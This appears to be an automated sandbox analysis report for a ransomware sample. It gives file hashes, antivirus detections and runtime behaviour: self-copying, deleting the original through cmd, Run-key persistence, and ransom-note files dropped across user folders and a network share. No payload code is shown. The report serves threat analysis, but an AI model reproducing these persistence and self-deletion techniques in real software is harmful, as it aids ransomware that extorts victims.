Analysis Date2016-02-14 05:47:23
MD55652b570b2c28cce99a474fc4275f6b2
SHA15cd397d17d392011a66f51a58a6fdb9d5af65941

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section.cbbl md5: 7b5fb64d62c9614a84a410589355d786 sha1: 7ab2f7ce2bd08d2eec22a82b24bedd05bc5c269e size: 141824
Section.rdata md5: 80e2301edbc94c9a1333609d35ceb5be sha1: c92a61d39c47df6e92aae058db539befebe02f65 size: 58880
Section.data md5: 8f09a779ddf14e486f6da3ddcde4a4c0 sha1: 25332fdefe385d517e499eb6af997da0bd1acdbc size: 36864
Section.rsrc md5: d82549349881ce799ca086341a0e0b7d sha1: bf001ffdeeb150a5b1e4888444c14d41078ed8e1 size: 188416
Timestamp2016-02-09 04:59:28
PackerMicrosoft Visual C++ ?.?
PEhashb499a67e859b00358cc4426f730d55afe8753a47
IMPhashbd2a8f9ba380f160b10d2209983a6ae7
AVCA (E-Trust Ino)Error Scanning File
AVRisingNo Virus
AVMcafeeBackDoor-FDCH!5652B570B2C2
AVAvira (antivir)TR/Crypt.Xpack.445889
AVTwisterNo Virus
AVAd-AwareGen:Variant.Midie.7265
AVAlwil (avast)No Virus
AVEset (nod32)Win32/Kryptik.ENJD
AVGrisoft (avg)Generic37.ALQE
AVSymantecTrojan.Cryptlock.N!g2
AVFortinetW32/Kryptik.ENJD!tr
AVBitDefenderGen:Variant.Midie.7265
AVK7Trojan ( 004ddc881 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt!rfn
AVMicroWorld (escan)Gen:Variant.Midie.7265
AVMalwareBytesTrojan.MalPack.PK
AVAuthentiumW32/Rovnix.C.gen!Eldorado
AVEmsisoftGen:Variant.Midie.7265
AVFrisk (f-prot)No Virus
AVIkarusTrojan.Win32.Crypt
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.ifq
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)No Virus
AVBullGuardNo Virus
AVArcabit (arcavir)Gen:Variant.Midie.7265
AVClamAVNo Virus
AVDr. WebTrojan.Inject1.56622
AVF-SecureGen:Variant.Midie.7265

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\sjfqljh.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\sjfqljh.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\5CD397~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\5CD397~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
RegistryHKEY_CURRENT_USER\Software\927051B6E2485B8D\data ➝
NULL
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_lujyhjfuj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
